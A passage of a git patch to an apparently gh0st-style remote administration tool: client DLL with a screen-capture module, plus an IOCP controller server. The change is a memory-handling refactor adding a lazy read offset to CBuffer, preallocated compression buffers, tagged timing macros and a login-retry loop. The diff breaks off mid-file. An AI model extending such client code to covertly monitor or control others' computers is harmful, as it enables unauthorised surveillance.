From 857bdd34bb1abf449c257fd0f39408e8b9927886 Mon Sep 17 00:00:00 2001 From: yuanyuanxiang <962914132@qq.com> Date: Sun, 30 Nov 2025 21:20:04 +0100 Subject: [PATCH] Improve: Reduce new / delete memory frequency in IOCPServer --- client/ClientDll.cpp | 3 +- client/IOCPClient.cpp | 4 +- client/ScreenSpy.cpp | 2 +- client/ScreenSpy.h | 2 +- common/locker.h | 12 +- server/2015Remote/2015RemoteDlg.cpp | 12 +- server/2015Remote/Buffer.cpp | 165 ++++++++++++++++++++-------- server/2015Remote/Buffer.h | 18 ++- server/2015Remote/IOCPServer.cpp | 154 +++++++++++++------------- server/2015Remote/Server.h | 164 +++++++++++++++++++-------- 10 files changed, 350 insertions(+), 186 deletions(-) diff --git a/client/ClientDll.cpp b/client/ClientDll.cpp index 1de5286..14ce132 100644 --- a/client/ClientDll.cpp +++ b/client/ClientDll.cpp @@ -569,7 +569,8 @@ DWORD WINAPI StartClient(LPVOID lParam) //准备第一波数据 LOGIN_INFOR login = GetLoginInfo(GetTickCount64() - dwTickCount, settings); - ClientObject->SendLoginInfo(login); + while (ClientObject->IsRunning() && ClientObject->IsConnected() && !ClientObject->SendLoginInfo(login)) + WAIT_n(app.m_bIsRunning(&app), 5 + time(0)%10, 200); do { Manager->SendHeartbeat(); diff --git a/client/IOCPClient.cpp b/client/IOCPClient.cpp index d5f38f7..0c70abc 100644 --- a/client/IOCPClient.cpp +++ b/client/IOCPClient.cpp @@ -509,7 +509,7 @@ VOID IOCPClient::OnServerReceiving(CBuffer* m_CompressedBuffer, char* szBuffer, // 关闭压缩开关时,SendWithSplit比较耗时。 BOOL IOCPClient::OnServerSending(const char* szBuffer, ULONG ulOriginalLength, PkgMask* mask) //Hello { - AUTO_TICK(40); + AUTO_TICK(40, ""); assert (ulOriginalLength > 0); { int cmd = BYTE(szBuffer[0]); @@ -559,7 +559,7 @@ BOOL IOCPClient::OnServerSending(const char* szBuffer, ULONG ulOriginalLength, P // 5 2 // 2 2 1 BOOL IOCPClient::SendWithSplit(const char* src, ULONG srcSize, ULONG ulSplitLength, int cmd, PkgMask* mask) { - AUTO_TICK(50); + AUTO_TICK(50, std::to_string(cmd)); if (src == nullptr || srcSize == 0 || ulSplitLength == 0) return FALSE; // Mask diff --git a/client/ScreenSpy.cpp b/client/ScreenSpy.cpp index a9a8b93..7cd9ccf 100644 --- a/client/ScreenSpy.cpp +++ b/client/ScreenSpy.cpp @@ -106,7 +106,7 @@ VOID CScreenSpy::ScanScreen(HDC hdcDest, HDC hdcSour, ULONG ulWidth, ULONG ulHei } return; } - AUTO_TICK(70); + AUTO_TICK(70, ""); #if COPY_ALL BitBlt(hdcDest, 0, 0, ulWidth, ulHeight, hdcSour, m_iScreenX, m_iScreenY, SRCCOPY); #else diff --git a/client/ScreenSpy.h b/client/ScreenSpy.h index 6f2651c..8b0f3a7 100644 --- a/client/ScreenSpy.h +++ b/client/ScreenSpy.h @@ -171,7 +171,7 @@ public: static BOOL CALLBACK EnumHwndsPrint(HWND hWnd, LPARAM lParam) { - AUTO_TICK_C(100); + AUTO_TICK_C(100, ""); if (FALSE == PaintWindow(hWnd, (EnumHwndsPrintData*)lParam)) { char text[_MAX_PATH] = {}; GetWindowText(hWnd, text, sizeof(text)); diff --git a/common/locker.h b/common/locker.h index 92368c9..1ebddd9 100644 --- a/common/locker.h +++ b/common/locker.h @@ -113,6 +113,7 @@ private: int line; int span; clock_t tick; + std::string tag; __inline clock_t now() const { return clock(); @@ -123,8 +124,8 @@ private: } public: - auto_tick(const char* file_name, const char* func_name, int line_no, int th = 5) : - file(file_name), func(func_name), line(line_no), span(th), tick(now()) { } + auto_tick(const char* file_name, const char* func_name, int line_no, int th = 5, const std::string &tag="") : + file(file_name), func(func_name), line(line_no), span(th), tick(now()), tag(tag) { } ~auto_tick() { stop(); @@ -136,7 +137,8 @@ public: int s(this->time()); if (s > span) { char buf[1024]; - sprintf_s(buf, "%s(%d) : [%s] cost [%d]ms.\n", file, line, func, s); + tag.empty() ? sprintf_s(buf, "%s(%d) : [%s] cost [%d]ms.\n", file, line, func, s) : + sprintf_s(buf, "%s(%d) : [%s] cost [%d]ms. Tag= %s. \n", file, line, func, s, tag.c_str()); OutputDebugStringA(buf); } span = 0; @@ -146,10 +148,10 @@ public: #ifdef _DEBUG // 智能计算当前函数的耗时,超时会打印 -#define AUTO_TICK(thresh) auto_tick TICK(__FILE__, __FUNCTION__, __LINE__, thresh) +#define AUTO_TICK(thresh, tag) auto_tick TICK(__FILE__, __FUNCTION__, __LINE__, thresh, tag) #define STOP_TICK TICK.stop() #else -#define AUTO_TICK(thresh) +#define AUTO_TICK(thresh, tag) #define STOP_TICK #endif diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index 4919399..9aec7a6 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -798,7 +798,7 @@ LRESULT CMy2015RemoteDlg::OnShowMessage(WPARAM wParam, LPARAM lParam) VOID CMy2015RemoteDlg::ShowMessage(CString strType, CString strMsg) { - AUTO_TICK(200); + AUTO_TICK(200, ""); CTime Timer = CTime::GetCurrentTime(); CString strTime= Timer.Format("%H:%M:%S"); @@ -1026,7 +1026,7 @@ BOOL CMy2015RemoteDlg::OnInitDialog() } \ } while(0) - AUTO_TICK(500); + AUTO_TICK(500, ""); CDialogEx::OnInitDialog(); UPDATE_SPLASH(20, "正在初始化文件上传模块..."); @@ -2034,7 +2034,7 @@ std::vector splitByNewline(const std::string& input) BOOL CMy2015RemoteDlg::Activate(const std::string& nPort,int nMaxConnection, const std::string& method) { - AUTO_TICK(200); + AUTO_TICK(200, ""); UINT ret = 0; if ( (ret = THIS_APP->StartServer(NotifyProc, OfflineProc, nPort, nMaxConnection, method)) !=0 ) { Mprintf("======> StartServer Failed \n"); @@ -2081,8 +2081,8 @@ BOOL CALLBACK CMy2015RemoteDlg::NotifyProc(CONTEXT_OBJECT* ContextObject) if (!g_2015RemoteDlg || g_2015RemoteDlg->isClosed) { return FALSE; } - - AUTO_TICK(50); + int cmd = ContextObject->GetBYTE(0); + AUTO_TICK(50, std::to_string(cmd)); if (ContextObject->hWnd) { if (!IsWindow(ContextObject->hWnd)) @@ -2537,6 +2537,8 @@ void CMy2015RemoteDlg::UpdateActiveWindow(CONTEXT_OBJECT* ctx) return; } } + ctx->CancelIO(); + Mprintf("UpdateActiveWindow failed: %s \n", ctx->GetPeerName().c_str()); } diff --git a/server/2015Remote/Buffer.cpp b/server/2015Remote/Buffer.cpp index ff690db..d5cc934 100644 --- a/server/2015Remote/Buffer.cpp +++ b/server/2015Remote/Buffer.cpp @@ -1,15 +1,18 @@ -#include "StdAfx.h" +#include "StdAfx.h" #include "Buffer.h" #include - -#define U_PAGE_ALIGNMENT 3 -#define F_PAGE_ALIGNMENT 3.0 +// 增大页面对齐大小,减少重新分配次数 (4KB对齐) +#define U_PAGE_ALIGNMENT 4096 +#define F_PAGE_ALIGNMENT 4096.0 +// 压缩阈值:当已读取数据超过此比例时才进行压缩 +#define COMPACT_THRESHOLD 0.5 CBuffer::CBuffer(void) { m_ulMaxLength = 0; + m_ulReadOffset = 0; m_Ptr = m_Base = NULL; @@ -27,6 +30,7 @@ CBuffer::~CBuffer(void) m_Base = m_Ptr = NULL; m_ulMaxLength = 0; + m_ulReadOffset = 0; } @@ -34,53 +38,76 @@ ULONG CBuffer::RemoveCompletedBuffer(ULONG ulLength) { EnterCriticalSection(&m_cs); - if (ulLength > m_ulMaxLength) { //ijȱڴijȻ + ULONG dataLen = m_Ptr - m_Base; + if (ulLength > m_ulMaxLength) { //请求长度比内存总长度还大 LeaveCriticalSection(&m_cs); return 0; } - if (ulLength > (m_Ptr - m_Base)) { //ij ЧݳȻ - ulLength = m_Ptr - m_Base; + if (ulLength > dataLen) { //请求长度比有效数据长度还大 + ulLength = dataLen; } if (ulLength) { - MoveMemory(m_Base,m_Base+ulLength, m_ulMaxLength - ulLength); + // 使用延迟移动策略:只更新读取偏移,不立即移动数据 + m_ulReadOffset += ulLength; - m_Ptr -= ulLength; + // 当已读取数据超过阈值时才进行压缩 + if (m_ulReadOffset > m_ulMaxLength * COMPACT_THRESHOLD) { + CompactBuffer(); + } } - DeAllocateBuffer(m_Ptr - m_Base); LeaveCriticalSection(&m_cs); return ulLength; } +// 压缩缓冲区,移除已读取的数据 +VOID CBuffer::CompactBuffer() +{ + // 此函数应在持有锁的情况下调用 + if (m_ulReadOffset > 0 && m_Base) { + ULONG remainingData = (m_Ptr - m_Base) - m_ulReadOffset; + if (remainingData > 0) { + MoveMemory(m_Base, m_Base + m_ulReadOffset, remainingData); + } + m_Ptr = m_Base + remainingData; + m_ulReadOffset = 0; + + // 尝试缩减缓冲区 + DeAllocateBuffer(remainingData); + } +} + ULONG CBuffer::ReadBuffer(PBYTE Buffer, ULONG ulLength) { EnterCriticalSection(&m_cs); - if (ulLength > m_ulMaxLength) { - LeaveCriticalSection(&m_cs); - return 0; - } + // 计算有效数据长度(考虑读取偏移) + ULONG effectiveDataLen = (m_Ptr - m_Base) - m_ulReadOffset; - if (ulLength > (m_Ptr - m_Base)) { - ulLength = m_Ptr - m_Base; + if (ulLength > effectiveDataLen) { + ulLength = effectiveDataLen; } if (ulLength) { - CopyMemory(Buffer,m_Base,ulLength); + // 从当前读取位置拷贝数据 + CopyMemory(Buffer, m_Base + m_ulReadOffset, ulLength); - MoveMemory(m_Base,m_Base+ulLength, m_ulMaxLength - ulLength); - m_Ptr -= ulLength; + // 更新读取偏移而不是移动数据 + m_ulReadOffset += ulLength; + + // 当已读取数据超过阈值时才进行压缩 + if (m_ulReadOffset > m_ulMaxLength * COMPACT_THRESHOLD) { + CompactBuffer(); + } } - DeAllocateBuffer(m_Ptr - m_Base); - LeaveCriticalSection(&m_cs); return ulLength; } -// ˽: +// 私有: 缩减缓存 ULONG CBuffer::DeAllocateBuffer(ULONG ulLength) { if (ulLength < (m_Ptr - m_Base)) @@ -93,7 +120,7 @@ ULONG CBuffer::DeAllocateBuffer(ULONG ulLength) } PBYTE NewBase = (PBYTE) VirtualAlloc(NULL,ulNewMaxLength,MEM_COMMIT,PAGE_READWRITE); - ULONG ulv1 = m_Ptr - m_Base; //ԭڴЧ + ULONG ulv1 = m_Ptr - m_Base; //从原来内存中的有效数据 CopyMemory(NewBase,m_Base,ulv1); VirtualFree(m_Base,0,MEM_RELEASE); @@ -124,7 +151,7 @@ BOOL CBuffer::WriteBuffer(PBYTE Buffer, ULONG ulLength) return TRUE; } -// ˽: +// 私有: 扩展缓存 ULONG CBuffer::ReAllocateBuffer(ULONG ulLength) { if (ulLength < m_ulMaxLength) @@ -137,7 +164,7 @@ ULONG CBuffer::ReAllocateBuffer(ULONG ulLength) } - ULONG ulv1 = m_Ptr - m_Base; //ԭȵЧݳ + ULONG ulv1 = m_Ptr - m_Base; //原先的有效数据长度 CopyMemory(NewBase,m_Base,ulv1); @@ -156,19 +183,21 @@ VOID CBuffer::ClearBuffer() { EnterCriticalSection(&m_cs); m_Ptr = m_Base; + m_ulReadOffset = 0; // 重置读取偏移 DeAllocateBuffer(1024); LeaveCriticalSection(&m_cs); } -ULONG CBuffer::GetBufferLength() // Чݳ +ULONG CBuffer::GetBufferLength() // 返回有效数据长度 { EnterCriticalSection(&m_cs); if (m_Base == NULL) { LeaveCriticalSection(&m_cs); return 0; } - ULONG len = m_Ptr - m_Base; + // 有效数据长度需要减去已读取的偏移量 + ULONG len = (m_Ptr - m_Base) - m_ulReadOffset; LeaveCriticalSection(&m_cs); return len; @@ -180,67 +209,111 @@ std::string CBuffer::Skip(ULONG ulPos) return ""; EnterCriticalSection(&m_cs); - std::string ret(m_Base, m_Base + ulPos); - MoveMemory(m_Base, m_Base + ulPos, m_ulMaxLength - ulPos); - m_Ptr -= ulPos; + // 从当前读取位置开始跳过 + std::string ret((char*)(m_Base + m_ulReadOffset), (char*)(m_Base + m_ulReadOffset + ulPos)); + + // 使用延迟移动策略 + m_ulReadOffset += ulPos; + + // 当已读取数据超过阈值时才进行压缩 + if (m_ulReadOffset > m_ulMaxLength * COMPACT_THRESHOLD) { + CompactBuffer(); + } LeaveCriticalSection(&m_cs); return ret; } -// ˺Ƕ̰߳ȫ. ֻԶʹ. +// 此函数是多线程安全的. 只能远程调用使用它. LPBYTE CBuffer::GetBuffer(ULONG ulPos) { EnterCriticalSection(&m_cs); - if (m_Base==NULL || ulPos >= (m_Ptr - m_Base)) { + // 计算有效数据长度 + ULONG effectiveDataLen = (m_Ptr - m_Base) - m_ulReadOffset; + if (m_Base == NULL || ulPos >= effectiveDataLen) { LeaveCriticalSection(&m_cs); return NULL; } - LPBYTE result = m_Base + ulPos; + // 返回相对于当前读取位置的指针 + LPBYTE result = m_Base + m_ulReadOffset + ulPos; LeaveCriticalSection(&m_cs); return result; } -// ˺Ƕ̰߳ȫ. ȡ棬õBuffer. +// 此函数是多线程安全的. 获取缓存,得到Buffer对象. Buffer CBuffer::GetMyBuffer(ULONG ulPos) { EnterCriticalSection(&m_cs); - ULONG len = m_Ptr - m_Base; - if (m_Base == NULL || ulPos >= len) { + ULONG effectiveDataLen = (m_Ptr - m_Base) - m_ulReadOffset; + if (m_Base == NULL || ulPos >= effectiveDataLen) { LeaveCriticalSection(&m_cs); return Buffer(); } - Buffer result = Buffer(m_Base+ulPos, len - ulPos); + Buffer result = Buffer(m_Base + m_ulReadOffset + ulPos, effectiveDataLen - ulPos); LeaveCriticalSection(&m_cs); return result; } -// ˺Ƕ̰߳ȫ. ȡָλôֵ. +// 此函数是多线程安全的. 获取缓存指定位置处的字节值. BYTE CBuffer::GetBYTE(ULONG ulPos) { EnterCriticalSection(&m_cs); - if (m_Base == NULL || ulPos >= (m_Ptr - m_Base)) { + ULONG effectiveDataLen = (m_Ptr - m_Base) - m_ulReadOffset; + if (m_Base == NULL || ulPos >= effectiveDataLen) { LeaveCriticalSection(&m_cs); - return NULL; + return 0; } - BYTE p = *(m_Base + ulPos); + BYTE p = *(m_Base + m_ulReadOffset + ulPos); LeaveCriticalSection(&m_cs); return p; } -// ˺Ƕ̰߳ȫ. 濽Ŀڴ. +// 此函数是多线程安全的. 将缓存拷贝到目标内存中. BOOL CBuffer::CopyBuffer(PVOID pDst, ULONG nLen, ULONG ulPos) { EnterCriticalSection(&m_cs); - ULONG len = m_Ptr - m_Base; - if (m_Base == NULL || len - ulPos < nLen) { + ULONG effectiveDataLen = (m_Ptr - m_Base) - m_ulReadOffset; + if (m_Base == NULL || effectiveDataLen - ulPos < nLen) { LeaveCriticalSection(&m_cs); return FALSE; } - memcpy(pDst, m_Base+ulPos, nLen); + memcpy(pDst, m_Base + m_ulReadOffset + ulPos, nLen); LeaveCriticalSection(&m_cs); return TRUE; -} \ No newline at end of file +} + +// 获取可直接写入的缓冲区指针,用于零拷贝接收 +LPBYTE CBuffer::GetWriteBuffer(ULONG requiredSize, ULONG& availableSize) +{ + EnterCriticalSection(&m_cs); + + // 先压缩缓冲区以获得更多空间 + if (m_ulReadOffset > 0) { + CompactBuffer(); + } + + // 确保有足够空间 + ULONG currentDataLen = m_Ptr - m_Base; + if (ReAllocateBuffer(currentDataLen + requiredSize) == (ULONG)-1) { + LeaveCriticalSection(&m_cs); + availableSize = 0; + return NULL; + } + + availableSize = m_ulMaxLength - currentDataLen; + LPBYTE result = m_Ptr; + LeaveCriticalSection(&m_cs); + + return result; +} + +// 确认写入完成,更新内部指针 +VOID CBuffer::CommitWrite(ULONG writtenSize) +{ + EnterCriticalSection(&m_cs); + m_Ptr += writtenSize; + LeaveCriticalSection(&m_cs); +} diff --git a/server/2015Remote/Buffer.h b/server/2015Remote/Buffer.h index 0e66f10..4ad0589 100644 --- a/server/2015Remote/Buffer.h +++ b/server/2015Remote/Buffer.h @@ -1,8 +1,8 @@ -#pragma once +#pragma once #include #include -// Buffer üĻ. +// Buffer 带引用计数的缓存. class Buffer { private: @@ -82,7 +82,7 @@ public: ~CBuffer(void); ULONG ReadBuffer(PBYTE Buffer, ULONG ulLength); - ULONG GetBufferLength(); // Чݳ + ULONG GetBufferLength(); // 返回有效数据长度 ULONG GetBufferLen() { return GetBufferLength(); @@ -104,11 +104,19 @@ public: ULONG RemoveCompletedBuffer(ULONG ulLength); std::string Skip(ULONG ulPos); + // 获取可直接写入的缓冲区指针,用于零拷贝接收 + // 返回可写入的起始地址,availableSize 返回可用空间大小 + LPBYTE GetWriteBuffer(ULONG requiredSize, ULONG& availableSize); + // 确认写入完成,更新内部指针 + VOID CommitWrite(ULONG writtenSize); + protected: PBYTE m_Base; PBYTE m_Ptr; ULONG m_ulMaxLength; + ULONG m_ulReadOffset; // 读取偏移,用于延迟数据移动 CRITICAL_SECTION m_cs; - ULONG DeAllocateBuffer(ULONG ulLength); // ˽ - ULONG ReAllocateBuffer(ULONG ulLength); // ˽ + ULONG DeAllocateBuffer(ULONG ulLength); // 私有 + ULONG ReAllocateBuffer(ULONG ulLength); // 私有 + VOID CompactBuffer(); // 压缩缓冲区,移除已读取数据 }; diff --git a/server/2015Remote/IOCPServer.cpp b/server/2015Remote/IOCPServer.cpp index 2246ef1..e051a83 100644 --- a/server/2015Remote/IOCPServer.cpp +++ b/server/2015Remote/IOCPServer.cpp @@ -1,11 +1,11 @@ -#include "StdAfx.h" +#include "StdAfx.h" #include "IOCPServer.h" #include "2015Remote.h" #include #include -// socket ȡͻIPַ. +// 根据 socket 获取客户端IP地址. std::string GetPeerName(SOCKET sock) { sockaddr_in ClientAddr = {}; @@ -14,7 +14,7 @@ std::string GetPeerName(SOCKET sock) return s != INVALID_SOCKET ? inet_ntoa(ClientAddr.sin_addr) : ""; } -// socket ȡͻIPַ. +// 根据 socket 获取客户端IP地址. std::string GetRemoteIP(SOCKET sock) { sockaddr_in addr; @@ -23,10 +23,10 @@ std::string GetRemoteIP(SOCKET sock) if (getpeername(sock, (sockaddr*)&addr, &addrLen) == 0) { char ipStr[INET_ADDRSTRLEN]; inet_ntop(AF_INET, &addr.sin_addr, ipStr, sizeof(ipStr)); - TRACE(">>> Զ IP ַ: %s\n", ipStr); + TRACE(">>> 对端 IP 地址: %s\n", ipStr); return ipStr; } - TRACE(">>> ȡԶ IP ʧ, : %d\n", WSAGetLastError()); + TRACE(">>> 获取对端 IP 失败, 错误码: %d\n", WSAGetLastError()); char buf[10]; sprintf_s(buf, "%d", sock); return buf; @@ -108,7 +108,7 @@ IOCPServer::~IOCPServer(void) while (!m_ContextFreePoolList.IsEmpty()) { CONTEXT_OBJECT *ContextObject = m_ContextFreePoolList.RemoveHead(); - // бʣ2019.1.14 + // 下述语句有崩溃概率,2019.1.14 //SAFE_DELETE(ContextObject->olps); delete ContextObject; } @@ -127,7 +127,7 @@ IOCPServer::~IOCPServer(void) WSACleanup(); } -// ش0ɹϢ. +// 返回错误码0代表成功,否则代表错误信息. UINT IOCPServer::StartServer(pfnNotifyProc NotifyProc, pfnOfflineProc OffProc, USHORT uPort) { m_nPort = uPort; @@ -139,7 +139,7 @@ UINT IOCPServer::StartServer(pfnNotifyProc NotifyProc, pfnOfflineProc OffProc, U return 1; } - m_sListenSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, WSA_FLAG_OVERLAPPED); //׽ + m_sListenSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, WSA_FLAG_OVERLAPPED); //创建监听套接字 if (m_sListenSocket == INVALID_SOCKET) { return 2; @@ -154,7 +154,7 @@ UINT IOCPServer::StartServer(pfnNotifyProc NotifyProc, pfnOfflineProc OffProc, U return 3; } - int iRet = WSAEventSelect(m_sListenSocket, //׽¼йFD_ACCEPT + int iRet = WSAEventSelect(m_sListenSocket, //将监听套接字与事件进行关联并授予FD_ACCEPT的属性 m_hListenEvent, FD_ACCEPT); @@ -173,9 +173,9 @@ UINT IOCPServer::StartServer(pfnNotifyProc NotifyProc, pfnOfflineProc OffProc, U SOCKADDR_IN ServerAddr; ServerAddr.sin_port = htons(uPort); ServerAddr.sin_family = AF_INET; - ServerAddr.sin_addr.s_addr = INADDR_ANY; //ʼ + ServerAddr.sin_addr.s_addr = INADDR_ANY; //初始化本地网卡 - //׻ֺbind + //将监听套机字和网卡进行bind iRet = bind(m_sListenSocket, (sockaddr*)&ServerAddr, sizeof(ServerAddr)); @@ -210,7 +210,7 @@ UINT IOCPServer::StartServer(pfnNotifyProc NotifyProc, pfnOfflineProc OffProc, U (HANDLE)CreateThread(NULL, 0, ListenThreadProc, - (void*)this, //Threadصthis ǵ̻߳صеijԱ + (void*)this, //向Thread回调函数传入this 方便我们的线程回调访问类中的成员 0, NULL); if (m_hListenThread==NULL) { @@ -224,14 +224,14 @@ UINT IOCPServer::StartServer(pfnNotifyProc NotifyProc, pfnOfflineProc OffProc, U return a; } - //߳ 1 2 + //启动工作线程 1 2 InitializeIOCP(); return 0; } -//1ɶ˿ -//2߳ +//1创建完成端口 +//2创建工作线程 BOOL IOCPServer::InitializeIOCP(VOID) { m_hCompletionPort = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0 ); @@ -244,7 +244,7 @@ BOOL IOCPServer::InitializeIOCP(VOID) } SYSTEM_INFO SystemInfo; - GetSystemInfo(&SystemInfo); //PCм + GetSystemInfo(&SystemInfo); //获得PC中有几核 m_ulThreadPoolMin = 1; m_ulThreadPoolMax = SystemInfo.dwNumberOfProcessors * 2; @@ -255,7 +255,7 @@ BOOL IOCPServer::InitializeIOCP(VOID) HANDLE hWorkThread = NULL; for (int i=0; i IOCPServer WorkThreadProc begin \n"); - ZSTD_DCtx* m_Dctx = ZSTD_createDCtx(); // ѹ + ZSTD_DCtx* m_Dctx = ZSTD_createDCtx(); // 解压上下文 IOCPServer* This = (IOCPServer*)(lParam); @@ -297,7 +297,7 @@ DWORD IOCPServer::WorkThreadProc(LPVOID lParam) timeBeginPeriod(1); while (This->m_bTimeToKill==FALSE) { InterlockedDecrement(&This->m_ulBusyThread); - // GetQueuedCompletionStatusʱȽϳ¿ͻ˷ݵ߲ + // GetQueuedCompletionStatus耗时比较长,导致客户端发送数据的速率提高不了 BOOL bOk = GetQueuedCompletionStatus( hCompletionPort, &dwTrans, @@ -306,7 +306,7 @@ DWORD IOCPServer::WorkThreadProc(LPVOID lParam) DWORD dwIOError = GetLastError(); OverlappedPlus = CONTAINING_RECORD(Overlapped, OVERLAPPEDPLUS, m_ol); ulBusyThread = InterlockedIncrement(&This->m_ulBusyThread); //1 1 - if ( !bOk && dwIOError != WAIT_TIMEOUT ) { //Է׻Ʒ˹ر + if ( !bOk && dwIOError != WAIT_TIMEOUT ) { //当对方的套机制发生了关闭 if (ContextObject && This->m_bTimeToKill == FALSE &&dwTrans==0) { ContextObject->olps = NULL; Mprintf("!!! RemoveStaleContext: %d \n", WSAGetLastError()); @@ -316,7 +316,7 @@ DWORD IOCPServer::WorkThreadProc(LPVOID lParam) continue; } if (!bError) { - //һµ̵̵̳߳߳߳ + //分配一个新的线程到线程到线程池 if (ulBusyThread == This->m_ulCurrentThread) { if (ulBusyThread < This->m_ulThreadPoolMax) { if (ContextObject != NULL) { @@ -376,7 +376,7 @@ DWORD IOCPServer::WorkThreadProc(LPVOID lParam) return 0; } -//ڹ߳б +//在工作线程中被调用 BOOL IOCPServer::HandleIO(IOType PacketFlags,PCONTEXT_OBJECT ContextObject, DWORD dwTrans, ZSTD_DCtx* ctx) { BOOL bRet = FALSE; @@ -410,15 +410,15 @@ BOOL IOCPServer::OnClientInitializing(PCONTEXT_OBJECT ContextObject, DWORD dwTr // May be this function should be a member of `CONTEXT_OBJECT`. BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyProc m_NotifyProc, ZSTD_DCtx* m_Dctx) { - AUTO_TICK(40); + AUTO_TICK(40, ""); BOOL ret = 1; try { - if (dwTrans == 0) { //Էر׽ + if (dwTrans == 0) { //对方关闭了套接字 return FALSE; } - //յݿԼڴwsabuff 8192 + //将接收到的数据拷贝到我们自己的内存中wsabuff 8192 ContextObject->InCompressedBuffer.WriteBuffer((PBYTE)ContextObject->szBuffer,dwTrans); - //鿴ݰ + //查看数据包的完整性 while (true) { PR pr = ContextObject->Parse(ContextObject->InCompressedBuffer); if (pr.IsFailed()) { @@ -434,20 +434,20 @@ BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyP ContextObject->InDeCompressedBuffer.WriteBuffer(CompressedBuffer, ulCompressedLength); if (m_NotifyProc(ContextObject)) ret = CompressedBuffer[0] == TOKEN_LOGIN ? 999 : 1; - SAFE_DELETE_ARRAY(CompressedBuffer); + // CompressedBuffer 由 CONTEXT_OBJECT 管理,不在此处释放 break; } ULONG ulPackTotalLength = 0; ContextObject->InCompressedBuffer.CopyBuffer(&ulPackTotalLength, sizeof(ULONG), pr.Result); - //ȡݰܳ5ֽڱʶ+4ֽݰܳ+4ֽԭʼݳ + //取出数据包的总长度5字节标识+4字节数据包总长度+4字节原始数据长度 int bufLen = ContextObject->InCompressedBuffer.GetBufferLength(); if (ulPackTotalLength && bufLen >= ulPackTotalLength) { ULONG ulCompressedLength = 0; ULONG ulOriginalLength = 0; PBYTE CompressedBuffer = ContextObject->ReadBuffer(ulCompressedLength, ulOriginalLength); if (ContextObject->CompressMethod == COMPRESS_UNKNOWN) { - delete[] CompressedBuffer; + // CompressedBuffer 由 CONTEXT_OBJECT 管理,不在此处释放 throw "Unknown method"; } else if (ContextObject->CompressMethod == COMPRESS_NONE) { ContextObject->InDeCompressedBuffer.ClearBuffer(); @@ -455,11 +455,12 @@ BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyP ContextObject->InDeCompressedBuffer.WriteBuffer(CompressedBuffer, ulOriginalLength); if (m_NotifyProc(ContextObject)) ret = CompressedBuffer[0] == TOKEN_LOGIN ? 999 : 1; - SAFE_DELETE_ARRAY(CompressedBuffer); + // CompressedBuffer 由 CONTEXT_OBJECT 管理,不在此处释放 continue; } bool usingZstd = ContextObject->CompressMethod == COMPRESS_ZSTD, zlibFailed = false; - PBYTE DeCompressedBuffer = new BYTE[ulOriginalLength]; //ѹڴ + // 使用预分配缓冲区,避免频繁内存分配 + PBYTE DeCompressedBuffer = ContextObject->GetDecompressBuffer(ulOriginalLength); size_t iRet = usingZstd ? Muncompress(DeCompressedBuffer, &ulOriginalLength, CompressedBuffer, ulCompressedLength) : uncompress(DeCompressedBuffer, &ulOriginalLength, CompressedBuffer, ulCompressedLength); @@ -470,7 +471,7 @@ BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyP if (m_NotifyProc(ContextObject)) ret = DeCompressedBuffer[0] == TOKEN_LOGIN ? 999 : 1; } else if (usingZstd) { - // zlibѹ + // 尝试用zlib解压缩 if (Z_OK == uncompress(DeCompressedBuffer, &ulOriginalLength, CompressedBuffer, ulCompressedLength)) { ContextObject->CompressMethod = COMPRESS_ZLIB; ContextObject->InDeCompressedBuffer.ClearBuffer(); @@ -485,8 +486,7 @@ BOOL ParseReceivedData(CONTEXT_OBJECT * ContextObject, DWORD dwTrans, pfnNotifyP } else { zlibFailed = true; } - delete [] CompressedBuffer; - delete [] DeCompressedBuffer; + // CompressedBuffer 和 DeCompressedBuffer 都由 CONTEXT_OBJECT 管理,不在此处释放 if (zlibFailed) { Mprintf("[ERROR] ZLIB uncompress failed \n"); throw "Bad Buffer"; @@ -510,7 +510,7 @@ BOOL IOCPServer::OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans return FALSE; } - PostRecv(ContextObject); //ͶµĽݵ + PostRecv(ContextObject); //投递新的接收数据的请求 return TRUE; } @@ -518,7 +518,7 @@ BOOL IOCPServer::OnClientReceiving(PCONTEXT_OBJECT ContextObject, DWORD dwTrans BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOriginalLength, ZSTD_CCtx* m_Cctx) { assert(ContextObject); - // ͵ + // 输出服务端所发送的命令 int cmd = szBuffer[0]; if (ulOriginalLength < 100 && cmd != COMMAND_SCREEN_CONTROL && cmd != CMD_HEARTBEAT_ACK && cmd != CMD_DRAW_POINT && cmd != CMD_MOVEWINDOW && cmd != CMD_SET_SIZE) { @@ -544,9 +544,9 @@ BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOr } bool usingZstd = ContextObject->CompressMethod == COMPRESS_ZSTD; unsigned long ulCompressedLength = usingZstd ? - ZSTD_compressBound(ulOriginalLength) : (double)ulOriginalLength * 1.001 + 12; - BYTE buf[1024]; - LPBYTE CompressedBuffer = ulCompressedLength>1024 ? new BYTE[ulCompressedLength]:buf; + ZSTD_compressBound(ulOriginalLength) : (unsigned long)((double)ulOriginalLength * 1.001 + 12); + // 使用预分配缓冲区替代每次 new + LPBYTE CompressedBuffer = ContextObject->GetSendCompressBuffer(ulCompressedLength); Buffer tmp(szBuffer, ulOriginalLength); szBuffer = tmp.Buf(); ContextObject->Encode(szBuffer, ulOriginalLength); @@ -557,14 +557,14 @@ BOOL WriteContextData(CONTEXT_OBJECT* ContextObject, PBYTE szBuffer, size_t ulOr if (usingZstd ? C_FAILED(iRet) : (S_OK != iRet)) { Mprintf("[ERROR] compress failed \n"); - if (CompressedBuffer != buf) delete [] CompressedBuffer; + // SendCompressBuffer 由 CONTEXT_OBJECT 管理,不在此处释放 return FALSE; } ulCompressedLength = usingZstd ? iRet : ulCompressedLength; ContextObject->WriteBuffer(CompressedBuffer, ulCompressedLength, ulOriginalLength, cmd); - if (CompressedBuffer != buf) delete [] CompressedBuffer; + // 